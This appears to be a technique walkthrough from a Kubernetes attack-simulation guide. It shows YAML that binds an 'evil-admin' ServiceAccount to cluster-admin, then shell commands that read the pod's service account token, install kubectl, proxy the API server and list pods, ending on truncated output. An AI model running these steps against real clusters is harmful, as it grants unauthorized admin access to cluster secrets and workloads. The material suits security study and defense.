The Kubernetes API server is the gateway to the cluster. Actions in the cluster are performed by sending various requests to the RESTful API. The status of the cluster, which includes all the components that are deployed on it, can be retrieved by the API server. Attackers may send API requests to probe the cluster and get information about containers, secrets, and other resources in the cluster.
First we create a high-privileged ServiceAccount like in “Cluster-admin binding for this technique, the privileges can vary and depending on it we can access and modify different information from the Kubernetes API.
apiVersion: v1
kind: ServiceAccount
metadata:
name: evil-admin
namespace: default
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: evil-admin-binding
namespace: default
subjects:
- kind: ServiceAccount
name: evil-admin
namespace: default
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
Next we can start a Pod which uses the evil-admin
ServiceAccount that we’ve created above. Then we download and configure kubectl
and start the local proxy so we can use curl
to access the Kubernetes API.
$ kubectl run access-k8s-api --rm -it --image=alpine --overrides='{ "spec": { "serviceAccount": "evil-admin" } }' -- ash
/ # API_SERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
/ # CA_CRT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
/ # TOKEN="$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
/ # apk update && apk add curl
/ # # For the following command please make sure you're using the correct system architecture (e.g. when using on Apple Silicon use arm64 instead of amd64)
/ # curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
/ # install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
/ # kubectl proxy --server="$API_SERVER" --certificate-authority="$CA_CRT" --token="$TOKEN" --accept-paths='^.*' &
/ # curl localhost:8001/api/v1/namespaces/default/pods
{
"kind": "PodList",
"apiVersion": "v1",
"metadata": {
"resourceVersion": "1408"
},
"items": [
...